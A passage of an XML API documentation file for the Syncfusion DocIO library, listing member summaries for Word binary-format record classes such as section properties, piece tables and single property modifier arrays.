            </summary>
            <param name="arrData"></param>
            <param name="iOffset"></param>
            <param name="converter"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceTable.FileCharacterPos">
            <summary>
            Returns array of character positions. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceTable.Entries">
            <summary>
            Returns array of binary table entries. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceTable.Length">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceTable.EntriesCount">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.PosStructReader">
            <summary>
            Summary description for PosStructReader.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PosStructReader.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PosStructReader.Read(System.IO.BinaryReader,System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.PosStructReaderDelegate)">
            <summary>
            
            </summary>
            <param name="binaryReader"></param>
            <param name="structCount"></param>
            <param name="deleg"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PosStructReader.Read(System.IO.BinaryReader,System.Int32,System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.PosStructReaderDelegate)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="dataLength"></param>
            <param name="structLength"></param>
            <param name="deleg"></param>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.PosStructReaderDelegate">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ReferencePositionTable">
            <summary>
            Summary description for ReferencePositionTable.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ReferencePositionTable.m_arrPositions">
            <summary>
            Locations of footnote references within the main text address space.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ReferencePositionTable.m_arrNumbers">
            <summary>
            Reference numbers.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ReferencePositionTable.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ReferencePositionTable.#ctor(System.Byte[])">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="data">Data to parse.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ReferencePositionTable.#ctor(System.Byte[],System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ReferencePositionTable.#ctor(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="iCount">Number of bytes for the new record.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ReferencePositionTable.#ctor(System.IO.Stream,System.Int32)">
            <summary>
            Creates new record from stream.
            </summary>
            <param name="stream">Stream with record's data.</param>
            <param name="iCount">Number of bytes to parse.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ReferencePositionTable.Parse(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Parses record.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset in the data array to the records data.</param>
            <param name="iCount">Number of bytes to parse.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ReferencePositionTable.Positions">
            <summary>
            Gets locations of footnote references within the main text
            address space. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ReferencePositionTable.Numbers">
            <summary>
            Gets reference numbers. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ReferencePositionTable.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionDescriptor">
            <summary>
            Summary description for SectionDescriptor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionDescriptor.DEF_RECORD_SIZE">
            <summary>
            Size of the record.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionDescriptor.m_structure">
            <summary>
            Underlying structure.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionDescriptor.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionDescriptor.#ctor(System.Byte[])">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionDescriptor.#ctor(System.Byte[],System.Int32)">
            <summary>
            
            </summary>
            <param name="arrData"></param>
            <param name="iOffset"></param>
            <param name="converter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionDescriptor.Parse(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Parses record.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset in the data array to the records data.</param>
            <param name="iCount">Number of bytes to parse.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionDescriptor.Internal1">
            <summary>
            used internally by Word (fn).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionDescriptor.Internal2">
            <summary>
            used internally by Word (fnMpr).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionDescriptor.SepxPosition">
            <summary>
            File offset in main stream to beginning of SEPX stored for section.
            If sed.fcSepx == 0xFFFFFFFF, the section properties for the section are equal
            to the standard SEP (see SEP definition).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionDescriptor.MacPrintOffset">
            <summary>
            Points to offset in FC space of main stream where the Macintosh Print Record
            for a document created on a Mac will be stored.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionDescriptor.UnderlyingStructure">
            <summary>
            Returns underlying class or structure.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionDescriptor.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionExceptionsTable">
            <summary>
            Summary description for SectionExceptionsTable.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionExceptionsTable.m_arrPositions">
            <summary>
            The boundaries (character positions) of sections in the Word document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionExceptionsTable.m_arrDescriptors">
            <summary>
            1-to-1 correspondence to the array of CPs.
            Each SED stores the beginning FC of the SEPX that records the properties
            for a section. If the FC stored in a SED is -1, the section properties of
            the section are exactly equal to the standard section properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionExceptionsTable.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionExceptionsTable.#ctor(System.Byte[])">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionExceptionsTable.#ctor(System.IO.Stream,System.Int32)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionExceptionsTable.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionExceptionsTable.Parse(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Parses the specified data.
            </summary>
            <param name="data">The data.</param>
            <param name="iOffset">The offset.</param>
            <param name="iCount">The count.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionExceptionsTable.Save(System.Byte[],System.Int32)">
            <summary>
            Saves record into array of bytes.
            </summary>
            <param name="arrData">Array of bytes to save record into.</param>
            <param name="iOffset">Offset in the array.</param>
            <returns>Number of bytes in the written data.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionExceptionsTable.Positions">
            <summary>
            The boundaries (character positions) of sections in the Word document.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionExceptionsTable.Descriptors">
            <summary>
            1-to-1 correspondence to the array of CPs.
            Each SED stores the beginning FC of the SEPX that records the properties
            for a section. If the FC stored in a SED is -1, the section properties of
            the section are exactly equal to the standard section properties.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionExceptionsTable.Length">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionExceptionsTable.EntriesCount">
            <summary>
            Number of elements in the collection.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties">
            <summary>
            Summary description for SectionProperties.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.m_sepx">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.m_stickProperties">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.#ctor">
            <summary>
            Default constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException)">
            <summary>
            Initializing constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.CloneSepx">
            <summary>
            Returns object with cloned members
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.HasOptions(System.Int32)">
            <summary>
            
            </summary>
            <param name="options"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.GetCopiableSprm">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.GetBorder(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            
            </summary>
            <param name="record"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.StickProperties">
            <summary>
            Copy paragraph properties or not
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.Sprms">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.HeaderHeight">
            <summary>
            Gets/sets the space between the header and the top of the page. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.FooterHeight">
            <summary>
            Gets/sets the space between the footer and the bottom of the page. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.TitlePage">
            <summary>
            Gets/sets whether a title page is to be displayed
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.BreakCode">
            <summary>
            Gets / sets break code
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.TextDirection">
            <summary>
            Gets / sets text direction
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.Columns">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.BottomMargin">
            <summary>
            Gets/sets the distance between the bottom edge of the page and 
            the bottom boundary of the text. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.TopMargin">
            <summary>
            Gets/sets the distance between the top edge of the page and 
            the top boundary of the text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.LeftMargin">
            <summary>
            Gets/sets the distance between the left edge of the page and 
            the left boundary of the text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.RightMargin">
            <summary>
            Gets/sets the distance between the right edge of the page and 
            the right boundary of the text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.Orientation">
            <summary>
            Orientation of pages in that section. Set page size firstly! 
            Set to 0 - when portrait, 2 - when landscape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.PageHeight">
            <summary>
            Gets/sets the height of the page in twips. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.PageWidth">
            <summary>
            Gets/sets the width of the page in twips. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.FirstPageTray">
            <summary>
            Gets/sets the bin in which the first page of the section will be printed
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.OtherPagesTray">
            <summary>
            Gets/sets the bin in which the other pages of the section will be printed
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.VerticalAlignment">
            <summary>
            Vertical justification code
                  0 top justified
                  1 centered
                  2 fully justified vertically 
                  3 bottom justified 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.Gutter">
            <summary>
            Gets/sets the size of the page gutter.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.Bidi">
            <summary>
            Gets / sets whether section contains right-to-left text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.PageNfc">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.PageStartAt">
            <summary>
            Gets or sets the value page start at.
            </summary>
            <value>The page start at.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.PageRestart">
            <summary>
            Gets or sets a value indicating whether to restart page.
            </summary>
            <value> if page restart, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.LinePitch">
            <summary>
            Gets or sets the line pitch.
            </summary>
            <value>The line pitch.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.PitchType">
            <summary>
            Gets or sets the type of the pitch.
            </summary>
            <value>The type of the pitch.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.DrawLinesBetweenCols">
            <summary>
            Gets or sets a value indicating whether to draw lines between columns.
            </summary>
            <value>
            	if draw lines between columns, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.ProtectForm">
            <summary>
            Gets or sets a value indicating whether [form protect].
            </summary>
            <value><c>true</c> if [form protect]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.ChapterPageSeparator">
            <summary>
            Gets or sets a value indicating  [Chapter numbering seprator in page number].
            </summary>
            <value>
            Chapter Page Separator 
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.HeadingLevelForChapter">
            <summary>
            Gets or sets a value indicating  [Chapter numbering level in page number].
            </summary>
            <value>
            Chapter Heading Level
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.LineNumberingMode">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.LineNumberingStep">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.LineNumberingStartValue">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.LineNumberingDistanceFromText">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.LeftBorder">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.TopBorder">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.RightBorder">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.BottomBorder">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.LeftBorderNew">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.TopBorderNew">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.RightBorderNew">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.BottomBorderNew">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.PageBorderApply">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.PageBorderIsInFront">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.PageBorderOffsetFrom">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.ColumnsCount">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.EndnoteNumberFormat">
            <summary>
            Gets / sets endnote numbering format
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.FootnoteNumberFormat">
            <summary>
            Gets / sets footnote numbering format
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.RestartIndexForEndnote">
            <summary>
            Gets / sets the restart index for endnote
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.RestartIndexForFootnotes">
            <summary>
            Gets / sets the restart index for footnotes
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.FootnotePosition">
            <summary>
            Gets / sets footnote position in the document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.InitialFootnoteNumber">
            <summary>
            Gets / sets the initial footnote number
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties.InitialEndnoteNumber">
            <summary>
            Gets / sets the initial endnote number
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException">
            <summary>
            Summary description for SectionPropertyException.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException.m_arrSprms">
            <summary>
            List of sprms that encodes the differences between the properties of
            a section and Word's default section properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException.#ctor(System.Boolean)">
            <summary>
            Creates instance and sets the default section properties
            </summary>
            <param name="isDefaultSEP">If true, loads the default section properties.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException.#ctor(System.IO.Stream)">
            <summary>
            Creates instance and gets data from the stream.
            </summary>
            <param name="stream">Stream with new instance data.</param>
            <param name="provider">MemoryConverter for structures convertions.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException.Parse(System.IO.Stream)">
            <summary>
            Extracts instance from the stream.
            </summary>
            <param name="stream">Stream with data.</param>
            <param name="provider">MemoryConverter for structures convertions.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException.Save(System.Byte[],System.Int32)">
            <summary>
            Saves record into array of bytes.
            </summary>
            <param name="arrData">Array of bytes to save record into.</param>
            <param name="iOffset">Offset in the array.</param>
            <returns>Number of bytes in the written data.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException.Properties">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException.Count">
            <summary>
            Number of property modifiers.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException.Length">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException.HeaderHeight">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException.FooterHeight">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException.IsTitlePage">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException.BreakCode">
            <summary>
            Gets / sets break code
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException.ColumnsCount">
            <summary>
            Gets / sets columns count
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ShadingDescriptor">
            <summary>
            Summary description for ShadingDescriptor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ShadingDescriptor.m_foreColorExt">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ShadingDescriptor.#ctor(System.Int16)">
            <summary>
            Initializing constructor
            </summary>
            <param name="shd"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ShadingDescriptor.#ctor">
            <summary>
            Default constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ShadingDescriptor.Clone">
            <summary>
            Clones the ShadingDescriptor instance.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ShadingDescriptor.Read(System.Int16)">
            <summary>
            
            </summary>
            <param name="shd"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ShadingDescriptor.Save">
            <summary>
            Returns non-parsed structure as short value
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ShadingDescriptor.ReadNewShd(System.Byte[],System.Int32)">
            <summary>
            
            </summary>
            <param name="shd"></param>
            <param name="offset"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ShadingDescriptor.SaveNewShd">
            <summary>
            Returns non-parsed structure as short value
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ShadingDescriptor.ForeColor">
            <summary>
            Gets/sets foreground color
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ShadingDescriptor.BackColor">
            <summary>
            Gets/sets background color
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ShadingDescriptor.Pattern">
            <summary>
            Gets/sets pattern
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ShadingDescriptor.StructLength">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray">
            <summary>
            Summary description for SinglePropertyModifierArray.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.m_arrModifiers">
            <summary>
            List of single property modifiers.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.#ctor(System.Byte[])">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="data">Data to parse.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.#ctor(System.Byte[],System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.#ctor(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="iCount">Number of bytes for the new record.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.#ctor(System.IO.Stream,System.Int32)">
            <summary>
            Creates new record from stream.
            </summary>
            <param name="stream">Stream with record's data.</param>
            <param name="iCount">Number of bytes to parse.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.RemoveValue(System.Int32)">
            <summary>
            Remove modifier from collection
            </summary>
            <param name="options"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.Parse(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Parses record.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset in the data array to the records data.</param>
            <param name="iCount">Number of bytes to parse.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.CheckDuplicateSprms(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            Check the duplicate sprm in single propety modifier array collection
            </summary>
            <param name="sprm">Current single property modifier array record</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.IsCorrectSprm(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            Determines whether sprm is correct.
            </summary>
            <param name="sprm">The Single Property Modifier Record.</param>
            <returns>
            	<c>true</c> if sprm is correct; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.IsValidCharacterPropertySprm(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            Checks for valid Character Property sprm
            </summary>
            <param name="sprm"></param>
            <returns>
            <c>true</c> if sprm is correct; otherwise, <c>false</c>.
            </returns>       
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.IsValidParagraphPropertySprm(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            Checks for valid paragraph Property sprm
            </summary>
            <param name="sprm"></param>
            <returns>
            <c>true</c> if sprm is correct; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.IsValidTablePropertySprm(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            Checks for valid Table Property sprm
            </summary>
            <param name="sprm"></param>
            <returns>
            <c>true</c> if sprm is correct; otherwise, <c>false</c>.
            </returns>
        </member>
